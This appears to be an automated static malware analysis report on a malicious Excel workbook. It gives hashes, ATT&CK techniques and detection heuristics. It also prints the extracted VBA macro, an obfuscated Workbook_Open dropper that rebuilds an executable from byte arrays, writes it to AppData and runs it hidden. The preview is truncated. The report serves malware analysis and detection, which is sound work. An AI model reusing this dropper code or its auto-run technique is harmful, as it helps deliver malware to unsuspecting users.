Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef5e1af8b3e0f7f6…

MALICIOUS

Office (OLE)

Size: 62.5 KB
Created: 2018-06-14 15:49:08
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: ba9fa0ec8de055e286fab60db4803226
SHA-1: c3cf7b955ec75c90859f92be83f8b3a43cefe75f
SHA-256: ef5e1af8b3e0f7f6658a513a6008cbfb83710f54d8327423db4bb65fa03d3813
Risk score: 188

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is an Excel document containing a Workbook_Open VBA macro that uses the Shell() function. As the extracted macro source shows, the macro reassembles an executable from byte arrays embedded in the VBA code (the first two bytes, 77 and 90, are the "MZ" PE header signature), writes it to 'cuhlq.exe' in the user's AppData directory (the path is resolved via Environ("APPDATA")), and then launches that file with a hidden window (vbHide). The document body displays a fake error message to coerce the user into enabling macros, a common social engineering tactic.

Heuristics (5)

  • ClamAV: Xls.Malware.Valyria-10036514-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
  • Workbook_Open macro (severity: high, rule: OLE_VBA_WBOPEN)
  • Environ() call (env variable access) (severity: low, rule: OLE_VBA_ENVIRON)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12662 bytes
SHA-256: 83bb03126b47b701d2ba6d207b1ddd290eb45b4f58c116d90f877d6c668d5d0a

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "BB"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AA"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WorKbOOK_oPEN(): Call hwslo: End Sub
Static Function hwslo() As Double
Call vbzig
End Function
Static Sub vbzig()
Call dwcxj
End Sub
Function dwcxj() As Double
Call rcjua
End Function
Function rcjua() As Single
Call yxmjd
End Function
Sub yxmjd()
Call mdtgv
End Sub
Static Function mdtgv() As Boolean
Call uywvx
End Function
Static Function uywvx() As Integer
Call iddsp
End Function
Static Sub iddsp()
Call pyggs
End Sub
Static Sub pyggs()
Call eenek
End Sub
Static Function eenek() As Long
Call aifzr(VBA.Environ$("apPDATa") & "\cuhlq.exe", ozpiu): Call VBA.Shell$(VBA.Environ$("apPDATa") & "\cuhlq.exe", vbHide)
End Function
Function ozpiu()
ozpiu = fbnmh
Call tpxnn(ozpiu, itwzj)
Call tpxnn(ozpiu, faeal)
Call tpxnn(ozpiu, jehnh)
Call tpxnn(ozpiu, rmyfd)
Call tpxnn(ozpiu, yexgl)
Call tpxnn(ozpiu, jmksw)
Call tpxnn(ozpiu, akacq)
Call tpxnn(ozpiu, layuc)
Call tpxnn(ozpiu, xrnjq)
Call tpxnn(ozpiu, nrzwv)
Call tpxnn(ozpiu, athld)
Call tpxnn(ozpiu, avdoc)
Call tpxnn(ozpiu, ywmzk)
Call tpxnn(ozpiu, hiheo)
Call tpxnn(ozpiu, hfdqt)
Call tpxnn(ozpiu, loeuj)
Call tpxnn(ozpiu, npetw)
Call tpxnn(ozpiu, csyau)
Call tpxnn(ozpiu, rjijy)
Call tpxnn(ozpiu, qplfq)
Call tpxnn(ozpiu, xpbtj)
Call tpxnn(ozpiu, zuzjq)
Call tpxnn(ozpiu, iqbxh)
Call tpxnn(ozpiu, esgma)
Call tpxnn(ozpiu, prmoz)
Call tpxnn(ozpiu, dzonq)
Call tpxnn(ozpiu, hzjht)
Call tpxnn(ozpiu, ayqoo)
End Function
Private Sub tpxnn(ByRef spurv As Variant, ByRef omapv As Variant): Dim fuxjb As Long: Dim mpfdc As Long: mpfdc = UBound(spurv) + 1: ReDim Preserve spurv(mpfdc + UBound(omapv)): For fuxjb = LBound(omapv) To UBound(omapv): spurv(mpfdc + fuxjb) = omapv(fuxjb): Next: End Sub
Function aifzr(hxesc, vjpll):       Dim bxlzl, aleho:           bxlzl = FreeFile:           Open hxesc For Binary Access Read Write As #bxlzl:              For aleho = LBound(vjpll) To UBound(vjpll):             Put #bxlzl, , CByte(vjpll(aleho)):      Next:       Close #bxlzl:       End Function
Function fbnmh()
fbnmh = Array(77, 90, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 64, 0, 0, 0, 80, 69, 0, 0, 76, 1 _
, 1, 0)
End Function
Function itwzj()
itwzj = Array(84, 106, 34, 91, 0, 0, 0, 0, 0, 0 _
, 0, 0, 224, 0, 14, 3, 11, 1, 0, 0 _
, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0 _
, 0, 0, 0, 0, 0, 0, 64, 0, 0, 16 _
, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0 _
, 0, 0)
End Function
Function faeal()
faeal = Array(0, 32, 0, 0, 0, 2, 0, 0, 0, 0 _
, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0 _
, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16 _
, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0)
End Function
Function jehnh()
jehnh = Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0)
End Function
Function rmyfd()
rmyfd = Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0 _
, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0 _
, 22, 5, 0, 0, 0, 2, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 32, 0, 0, 160, 0, 0, 0, 0, 0, 0 _
, 0, 0
... (truncated)